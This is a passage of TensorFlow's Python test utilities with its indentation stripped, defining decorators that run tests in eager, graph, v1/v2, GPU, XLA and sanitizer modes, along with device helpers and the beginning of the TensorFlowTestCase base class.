@disable_eager_op_as_function("b/xyzabc")
def testDisabledForEagerOpAsFunction(self):
...
Generated class:
class SessionTest(test.TestCase):
def testEnabledForEagerOpAsFunction(self):
...
def testEnabledForEagerOpAsFunctionWithEagerOpAsFunctionEnabled(self):
// Enable run_eager_op_as_function
// Reset context
testEnabledForEagerOpAsFunction(self)
// Disable run_eager_op_as_function
// Reset context
def testDisabledForEagerOpAsFunction(self):
...
Args:
cls: class to decorate.
only_as_function: whether to run all the tests in the TestCase in eager mode
and in eager_op_as_function mode. By default it will run all tests in both
modes. When `only_as_function=True` tests will not be run in eager mode.
Returns:
cls with new test methods added.
"""
def decorator(cls):
if context.run_eager_op_as_function_enabled():
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
(name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("benchmark")) and
not getattr(value, "_disable_eager_op_as_function", False)):
setattr(cls, name + "WithEagerOpAsFunctionEnabled",
enable_eager_op_as_function(value))
if only_as_function:
delattr(cls, name)
return cls
if cls is not None:
return decorator(cls)
return decorator
def disable_eager_op_as_function(unused_msg):
"""Decorator for a function in a with_eager_op_as_function enabled test class.
Blocks the function from being run with eager_op_as_function enabled.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_eager_op_as_function attr set to True.
"""
def wrapper(func):
func._disable_eager_op_as_function = True
return func
# Once the environment flag is flipped and `run_eager_op_as_function_enabled`
# is True by default, the `with_eager_op_as_function` wrapper will not add a
# separate test for eager_op_as_function execution. In that case the test with
# the original name needs to be disabled.
if context.run_eager_op_as_function_enabled():
return _disable_test(execute_func=False)
return wrapper
def set_xla_env_flag(func=None, flag=""):
"""Decorator for setting XLA_FLAGS prior to running a test.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will allow users to set any xla flags
exposed via the XLA_FLAGS environment variable, execute the test, then reset
the XLA_FLAGS to the state it was in prior to this test.
Example:
class MyTest(test.TestCase):
@set_xla_env_flag(flag='--xla_gpu_enable_fast_min_max=false')
def testFoo(self):
...
Args:
func: The function to be wrapped.
flag: The xla flag to be set in the XLA_FLAGS env variable.
Returns:
The wrapped function.
"""
def decorator(f):
@functools.wraps(f)
def decorated(*args, **kwargs):
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = flag
if original_xla_flags:
new_xla_flags = new_xla_flags + " " + original_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
try:
return f(*args, **kwargs)
finally:
if original_xla_flags is None:
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = original_xla_flags
return decorated
if func is not None:
return decorator(func)
return decorator
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically checks
generated graph. Attempting to evaluate graph or function results via.
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
return ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_async_and_sync_mode(f):
"""Execute the test in async mode and sync mode."""
@parameterized.named_parameters([("Async", True), ("", False)])
@functools.wraps(f)
def decorator(self, async_mode, *args, **kwargs):
if async_mode:
with context.execution_mode(context.ASYNC):
f(self, *args, **kwargs)
else:
with context.execution_mode(context.SYNC):
f(self, *args, **kwargs)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return tf_decorator.make_decorator(f, decorated)
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.inside_function():
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_or_tpu(func=None):
"""Execute the decorated test only if a physical GPU or TPU is available.
This function is intended to be applied to tests that require the presence
of a physical GPU or TPU. It complies with the following rules:
- If a GPU is available, the test will run on the GPU.
- If a GPU is absent and a TPU is available, the test will run on the TPU.
- If both GPU and TPU are absent, the test will be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_or_tpu` only supports test methods.")
def decorated(self, *args, **kwargs):
if config.list_physical_devices("GPU"):
return f(self, "GPU", *args, **kwargs)
if config.list_physical_devices("TPU"):
return f(self, "TPU", *args, **kwargs)
self.skipTest("Test requires GPU or TPU")
return decorated
return decorator if func is None else decorator(func)
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
@deprecation.deprecated(None,
"Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function would
also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
was build with CUDA support.
For example,
>>> gpu_available = tf.test.is_gpu_available()
>>> is_cuda_gpu_available = tf.test.is_gpu_available(cuda_only=True)
>>> is_cuda_gpu_min_3 = tf.test.is_gpu_available(True, (3,0))
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading (since routine will
return true when a GPU device is available irrespective of whether TF was
built with CUDA support or ROCm support. However no changes here because
++ Changing the name "cuda_only" to something more generic would break
backward compatibility
++ Adding an equivalent "rocm_only" would require the implementation check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only"
Returns:
True if a GPU device of the requested kind is available.
"""
# This was needed earlier when we had support for SYCL in TensorFlow.
del cuda_only
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
cc = gpu_info.compute_capability or (0, 0)
if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
@contextlib.contextmanager
def deterministic_ops():
"""Enables deterministic ops."""
try:
config.enable_op_determinism()
yield
finally:
config.disable_op_determinism()
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evaluate `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def disable_cudnn_autotune(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CuDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = "--xla_gpu_autotune_level=0"
if original_xla_flags:
new_xla_flags = original_xla_flags + " " + new_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
result = f(self, *args, **kwargs)
if (original_tf_cudnn_use_autotune is None):
del os.environ["TF_CUDNN_USE_AUTOTUNE"]
else:
os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
if (original_xla_flags is None):
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = original_xla_flags
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# Updates test function by selectively disabling it.
def _disable_test(execute_func):
def disable_test_impl(func):
def decorator(func):
def decorated(self, *args, **kwargs):
if execute_func:
return func(self, *args, **kwargs)
return tf_decorator.make_decorator(func, decorated)
if func is not None:
return decorator(func)
return decorator
return disable_test_impl
# The description is just for documentation purposes.
def disable_xla(description): # pylint: disable=unused-argument
"""Execute the test method only if xla is not enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_mlir_bridge(description): # pylint: disable=unused-argument
"""Execute the test method only if MLIR bridge is not enabled."""
execute_func = not is_mlir_bridge_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_asan(description): # pylint: disable=unused-argument
"""Execute the test method only if ASAN is not enabled."""
execute_func = not is_asan_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_msan(description): # pylint: disable=unused-argument
"""Execute the test method only if MSAN is not enabled."""
execute_func = not is_msan_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_tsan(description): # pylint: disable=unused-argument
"""Execute the test method only if TSAN is not enabled."""
execute_func = not is_tsan_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_ubsan(description): # pylint: disable=unused-argument
"""Execute the test method only if UBSAN is not enabled."""
execute_func = not is_ubsan_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_tfrt(unused_description):
def disable_tfrt_impl(cls_or_func):
"""Execute the test only if tfrt is not enabled."""
if tf_inspect.isclass(cls_or_func):
if tfrt_utils.enabled():
return None
else:
return cls_or_func
else:
def decorator(func):
def decorated(self, *args, **kwargs):
if tfrt_utils.enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if cls_or_func is not None:
return decorator(cls_or_func)
return decorator
return disable_tfrt_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
"""This test is not intended to be run with XLA auto jit enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
# The description is just for documentation purposes.
def run_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute test with TensorFloat-32 disabled.
While almost every real-world deep learning model runs fine with
TensorFloat-32, many tests use assertAllClose or similar methods.
TensorFloat-32 matmuls typically will cause such methods to fail with the
default tolerances.
Args:
description: A description used for documentation purposes, describing why
the test requires TensorFloat-32 to be disabled.
Returns:
Decorator which runs a test with TensorFloat-32 disabled.
"""
def decorator(f):
@functools.wraps(f)
def decorated(self, *args, **kwargs):
allowed = config.tensor_float_32_execution_enabled()
try:
config.enable_tensor_float_32_execution(False)
f(self, *args, **kwargs)
finally:
config.enable_tensor_float_32_execution(allowed)
return decorated
return decorator
# The description is just for documentation purposes.
def run_all_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute all tests in a class with TensorFloat-32 disabled."""
return for_all_test_methods(run_without_tensor_float_32, description)
def matmul_without_tf32(a, b, *args, **kwargs):
"""Run matmul but cast float32 inputs to float64 if TensorFloat-32 is enabled.
This effectively runs matmul without TensorFloat-32. It should only be used in
tests when verifying some other op or functions works correctly, e.g. to test
`tf.linalg.sqrtm` by matrix multiplying the output of the op by itself. In
such cases, the matmul itself is not being tested so it's OK to run it with
higher precision.
If a matmul itself is being tested, or some other op which uses matmul, use
`run_without_tensor_float_32` instead.
This also casts complex64 inputs to complex128, since TensorFloat-32 can also
be used with complex64
Args:
a: First input to tf.linalg.matmul
b: Second input to tf.linalg.matmul
args: Other positional arguments to tf.linalg.matmul
**kwargs: Other keyword arguments to tf.linalg.matmul
Returns:
A tensor with the same type as `a`.
"""
if config.tensor_float_32_execution_enabled() and a.dtype == "float32":
a = math_ops.cast(a, "float64")
b = math_ops.cast(b, "float64")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
elif config.tensor_float_32_execution_enabled() and a.dtype == "complex64":
a = math_ops.cast(a, "complex128")
b = math_ops.cast(b, "complex128")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
else:
return math_ops.matmul(a, b, *args, **kwargs)
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
# Make sure we get unfiltered stack traces during the test
traceback_utils.disable_traceback_filtering()
if is_xla_enabled():
pywrap_tf_session.TF_SetXlaAutoJitMode("2")
pywrap_tf_session.TF_SetXlaMinClusterSize(1)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
# Check if the mlir bridge has been explicitly enabled or disabled. If
# is_mlir_bridge_enabled() returns None, the user did not explictly enable
# or disable the bridge so do not update enable_mlir_bridge.
if is_mlir_bridge_enabled():
context.context().enable_mlir_bridge = True
elif is_mlir_bridge_enabled() is not None:
context.context().enable_mlir_bridge = False
self._threads = []
self._tempdir = None
self._cached_session = None
self._test_start_time = None
# This flag provides the ability to control whether the graph mode gets
# initialized for TF1 or not. Initializing for TF1, which is what was
# happening earlier, was preventing enablement of 'eager mode' in the test.
self._set_default_seed = True
def setUp(self):
super(TensorFlowTestCase, self).setUp()
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
if self._set_default_seed:
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
self._test_start_time = time.time()
def tearDown(self):
# If a subclass overrides setUp and doesn't call the parent class's setUp,
# then we may not have set the start time.
if self._test_start_time is not None:
logging.info("time(%s): %ss", self.id(),
round(time.time() - self._test_start_time, 2))
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
super(TensorFlowTestCase, self).tearDown()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
